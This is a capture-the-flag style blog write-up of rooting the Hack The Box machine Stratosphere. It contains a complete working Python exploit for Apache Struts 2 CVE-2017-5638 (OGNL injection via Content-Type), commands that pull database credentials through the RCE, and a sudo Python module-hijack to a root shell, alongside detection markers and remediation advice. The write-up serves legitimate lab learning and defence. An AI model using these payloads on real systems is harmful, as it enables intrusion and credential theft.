Hello everyone!

Introduction

The box was pretty fun, with some rabbit holes that can really frustrate someone (personal experience). Once the vulnerability has been exposed, things do not get easy from there, as the box itself has many protections. I am going to show you how I owned this box. In short: the web application served by Apache Tomcat was running Apache Struts 2 and was vulnerable to the Struts OGNL remote code execution bug (CVE-2017-5638); leveraging that we get a user's credentials, SSH in, and then hijack a Python library imported by a sudo-able script (called DLL injection below) to get root.

Initial Enumeration

The first enumeration step is an nmap scan followed by brute forcing website directories. For this purpose I created an automation tool called “AutoRecon”, which I use here, but you can always do this manually.

The nmap command used (-sV for service/version detection, -sC for the default script set, -oA to save the results in all three output formats):

nmap -v -sV -sC 10.10.10.64 -oA nmap/scanResults

Nmap returned the following:

It shows three open ports: 22, 80 and 8080. I did a full port scan but did not find anything different. Everything seems normal; nothing much to do here.

Visiting the website, we are greeted with this:

Pretty dandy if you ask me >_< !! Let's start the directory brute forcing then!

The gobuster command used:

gobuster dir -u http://10.10.10.64/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Hmm?? Interesting!! This is starting to get interesting now! We get two directories, but the status is 302, which is a redirect (302 is “Found”; “Moved Permanently” is 301), so gobuster is only seeing where each path redirects to, not the content itself.

Without further ado, let's look them up!

A request to http://10.10.10.64/manager returned the following:

It's asking for credentials, which we don't have; still, I tried some basic combinations like “admin::admin”, “admin::password” and such, but with no luck :( .

A request to http://10.10.10.64/Monitoring actually redirected me to http://10.10.10.64/Monitoring/example/Welcome.action, and this is what greeted me.

Clicking on both the links showed this:

At this point I did some more directory brute forcing and used all the wordlists, but I didn't have a clue as to what to do next. I thought that if http://10.10.10.64/manager requires a login and http://10.10.10.64/Monitoring/example/Welcome.action is a site under construction, then why bother with the latter? Something is definitely fishy in the second URL. My mistake was that I was searching for credentials to log in to the first one and lost a lot of time. Then I noticed something strange in the second website.

Apache Struts Vulnerability

I noticed that the URLs of the second website were kind of strange; I had never seen them before.

Precisely! They all ended with “.action”, and after searching I found the gold mine I was looking for.

From https://www.tutorialspoint.com/struts_2/struts_actions.htm , “Actions are the core of the Struts2 framework, as they are for any MVC (Model View Controller) framework. Each URL is mapped to a specific action, which provides the processing logic which is necessary to service the request from the user.

But the action also serves in two other important capacities. Firstly, the action plays an important role in the transfer of data from the request through to the view, whether it's a JSP or other type of result. Secondly, the action must assist the framework in determining which result should render the view that will be returned in the response to the request.”

From Wikipedia:

“Struts 2 has a history of critical security bugs, many tied to its use of OGNL technology, some vulnerabilities can lead to arbitrary code execution. In October 2017, it was reported that failure by Equifax to address a Struts 2 vulnerability advised in March 2017 was later exploited in the data breach that was disclosed by Equifax in September 2017.”

Exploitation

So, if RCE is possible then we should be able to get a reverse shell and subsequently own the box. I found an exploit via searchsploit (https://www.exploit-db.com/exploits/41570), but there was a problem. My first plan was to play around with the RCE, then use reverse shell commands to get myself a shell via netcat, but that required multi-part commands and this exploit only allowed single-argument commands like “ls”, “whoami” and so on. I tried to change this but only ended up complicating things. No doubt this is what I wanted (all the single-argument commands worked), but the exploit needs to be modified a bit. I searched for “CVE-2017-5638 github” and came across this beautiful repo: https://github.com/mazen160/struts-pwn. This exploit had exactly what I wanted: I can run multiple commands at once (“I'm great at things like this” *>_<).
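For readers who want to see what CVE-2017-5638 actually is rather than just run a tool: the Jakarta Multipart parser in vulnerable Struts 2 releases evaluates a malformed Content-Type header as an OGNL expression while building its error message, so the whole exploit is one HTTP request with a crafted header. The following is an added example, not code from the original post, struts-pwn or EDB-41570; it builds the same public OGNL chain those exploits use, wraps the command in /bin/bash -c (which is why chained commands such as “cd ../../../home && ls -la” work in one request), and adds a small defender-side check for OGNL in a Content-Type value. The URL argument and the marker list are assumptions for illustration.

```python
"""CVE-2017-5638: OGNL injection through the Content-Type header (added example)."""
import urllib.request


def build_content_type(cmd: str) -> str:
    """Return the OGNL payload (the public EDB-41570 chain) that runs cmd.

    The command is embedded in an OGNL single-quoted string literal and
    handed to /bin/bash -c, so shell operators like && work inside it.
    """
    if "'" in cmd:
        # A literal single quote would terminate the OGNL string; use double
        # quotes inside the command instead.
        raise ValueError("command must not contain single quotes")
    parts = [
        "(#_='multipart/form-data')",
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)",
        # Disable the OGNL sandbox: set member access directly on older
        # versions, or clear the excluded class/package lists on newer ones.
        "(#_memberAccess?(#_memberAccess=#dm):"
        "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        "(#ognlUtil.getExcludedPackageNames().clear())."
        "(#ognlUtil.getExcludedClasses().clear())."
        "(#context.setMemberAccess(#dm))))",
        f"(#cmd='{cmd}')",
        "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))",
        "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))",
        "(#p=new java.lang.ProcessBuilder(#cmds))",
        "(#p.redirectErrorStream(true))",
        "(#process=#p.start())",
        # Copy the command's stdout/stderr straight into the HTTP response body.
        "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))",
        "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))",
        "(#ros.flush())",
    ]
    return "%{" + ".".join(parts) + "}"


def exploit(url: str, cmd: str, timeout: float = 10.0) -> str:
    """Send the payload to a Struts .action URL and return the command output.

    url is an assumption, e.g. http://10.10.10.64/Monitoring/example/Welcome.action
    """
    req = urllib.request.Request(url, headers={"Content-Type": build_content_type(cmd)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Heuristic markers (assumed list) for spotting this attack in request logs or a WAF.
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "@ognl.OgnlContext", "ProcessBuilder")


def looks_like_ognl_injection(content_type: str) -> bool:
    """Defender-side check: a legitimate Content-Type never carries OGNL."""
    return any(marker in content_type for marker in OGNL_MARKERS)


if __name__ == "__main__":
    import sys
    print(exploit(sys.argv[1], " ".join(sys.argv[2:]) or "id"))
```

Because the header, not the body, carries the payload, any request method works and the request itself need not be multipart; on the detection side this also means checking Content-Type values for `%{` is a cheap and reliable signal.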

After reading its documentation I ran it as:

It worked and we see the id of the tomcat user showing up. Now, after all this, I am still after those credentials so that we can log in to that site, and I know any user on this box should have a directory under /home, so here I go!

Chaining commands, I fished out the user “richard”!!

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'cd ../../../home && ls -la'

But the trouble is, I don't know richard's password, so I can't SSH in as that user. Need more enumeration.

Looking at the tomcat directory I found a file called “db_connect”, a text file containing database credentials.

Retrieving credentials from Database

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'cat db_connect'

Caution: the first set of credentials is a rabbit hole! I learned that the hard way T_T

I tried to log in to MySQL from my own machine using the credentials given here, but it seems Stratosphere was blocking the connection (consistent with 3306 not showing up in the nmap results). The only way is to use the RCE to access it. Again, remember we don't have a reverse shell, so it has to be a one-liner command. We know the database name is “users”, so “SELECT * FROM <tableName>” should work!

This was, in my opinion, the hardest part! After much trial and error, and searching, I finally got it to work. This article helped me a lot: https://medium.com/bugbountywriteup/alternatives-to-extract-tables-and-columns-from-mysql-and-mariadb-813171d3c8bc ! But how many tables are there? I ran the following to find out.

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'mysql -u admin -padmin -e "use users; show tables"'

It immediately told me that the table name is “accounts”! UwU!

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'mysql -u admin -padmin -e "use users; SELECT * from accounts"'

aaanddd… we got richard's password!! Who would have known it was here!!! OwO

Let's SSH in!!!

Everything's fine! user.txt is done! Now privilege escalation!

Privilege Escalation — DLL Injection

HTB has taught me many things, and one of them is abusing sudo to get an escalation. So that's what I do: sudo -l

This sure returned interesting results! richard can run /home/richard/test.py as root without a password, and the sudo rule allows any interpreter matching /usr/bin/python*, so he can also pick the Python version used to run it. It is now pretty obvious that if we somehow hijack test.py and force it to run system commands, we are pretty much done. And yes, it was that easy!

Taking a look at test.py

It's asking us to crack some hashes, after which it will run os.system('/root/success.py'). It has cleverly tucked the import of the os module inside the “question” function; the last boss lives up to its name!

Now obviously it does not want us to win this little cracking game (yes, I tried). The first three hashes seem easy, and hashcat will do its job perfectly, but the last one is intentionally there to stop us. Here comes DLL injection!!!

What I am calling DLL injection here is, more precisely, Python library (module) hijacking: when the interpreter runs a script, it puts the script's own directory at the front of sys.path, ahead of the standard library, so a file with the same name as an imported module in that directory is loaded instead of the real one. test.py imports hashlib, lives in richard's writable home directory, and is run as root via sudo, which makes hashlib the perfect target. Once /usr/lib/python2.7/hashlib.py is no longer the module that gets imported and our own hashlib.py in the home folder is loaded in its place, the whole cracking game crumbles! Let's do it!

Let's create our own hashlib.py, which will be imported instead of the original and spawn a shell as root:

echo 'import os; os.system("/bin/bash")' > hashlib.py
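To see the mechanism without a root shell, here is an added, self-contained demonstration (not code from the original post or from the box): it builds a throwaway directory holding a constructed stand-in for test.py and a rogue hashlib.py that only sets a marker, runs the script by absolute path the way sudo would, and then runs it again with the interpreter's isolated mode (-I), which keeps the script directory off sys.path. The file contents and the md5 check are assumptions made up for the demo; the script on the box does more than this.

```python
"""Python library hijacking: a hashlib.py beside the target script wins (added example)."""
import os
import subprocess
import sys
import tempfile
import textwrap

# Constructed stand-in for the attacker's hashlib.py. It provides only what the
# target script calls and sets a marker instead of spawning a shell.
ROGUE_HASHLIB = textwrap.dedent("""\
    HIJACKED = True  # marker; the real attack would run os.system("/bin/bash")

    def md5(data):
        class Fake:
            def hexdigest(self):
                return "hijacked"
        return Fake()
    """)

# Constructed stand-in for the sudo-able test.py: import hashlib and use it.
TARGET_SCRIPT = textwrap.dedent("""\
    import hashlib
    print(getattr(hashlib, "HIJACKED", False))
    print(hashlib.md5(b"test").hexdigest())
    """)


def write_lab(directory: str) -> None:
    """Drop test.py and the rogue hashlib.py into the same directory."""
    with open(os.path.join(directory, "test.py"), "w") as f:
        f.write(TARGET_SCRIPT)
    with open(os.path.join(directory, "hashlib.py"), "w") as f:
        f.write(ROGUE_HASHLIB)


def run_target(directory: str, isolated: bool = False) -> tuple:
    """Run test.py like sudo would: by absolute path, from an unrelated cwd.

    Returns (hijacked, md5_hex). isolated=True adds -I (Python 3.4+), which
    leaves the script directory out of sys.path and ignores PYTHON* variables.
    """
    cmd = [sys.executable]
    if isolated:
        cmd.append("-I")
    cmd.append(os.path.join(directory, "test.py"))
    # Make sure PYTHONSAFEPATH (3.11+) does not hide the default behaviour.
    env = {k: v for k, v in os.environ.items() if k != "PYTHONSAFEPATH"}
    out = subprocess.run(cmd, capture_output=True, text=True, check=True,
                         cwd="/", env=env)
    hijacked, digest = out.stdout.split()
    return hijacked == "True", digest


def demo() -> dict:
    """Compare a default run with an isolated (-I) run of the same script."""
    with tempfile.TemporaryDirectory() as d:
        write_lab(d)
        return {"default": run_target(d), "isolated": run_target(d, isolated=True)}


if __name__ == "__main__":
    for mode, (hijacked, digest) in demo().items():
        print(f"{mode:8s} hijacked={hijacked} md5(b'test')={digest}")
```

The default run reports the rogue module, the -I run reports the real hashlib. Note that -I does not exist on the Python 2.7 interpreter the box runs, so the realistic fix is in sudoers: never grant NOPASSWD for an interpreter (let alone a /usr/bin/python* wildcard) on a script that sits in a directory the user can write to; the script's own permissions do not matter when its imports can be replaced.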

Time for the final attack! STARBURST STREAM!

YESS!! WE ARE ROOT!! root.txt can be obviously obtained from the root directory!

Conclusion

In the end, I enjoyed this box. I was so frustrated in the beginning, and that I ignored what was in front of me for so long just goes to show how well these are made! There were many rabbit holes in this one! After finishing the box I tested DLL injection on my home Kali machine too, and yes, it was vulnerable, but since I am the only user that should not be a problem; it can be a problem in a multi-user environment. This was my first blog post; I hope you enjoyed it! I plan to post more security related stuff: write-ups, exploits, CVEs and the like, so please look forward to it. Any suggestions or improvements to my steps are greatly welcome!

Stay Cool!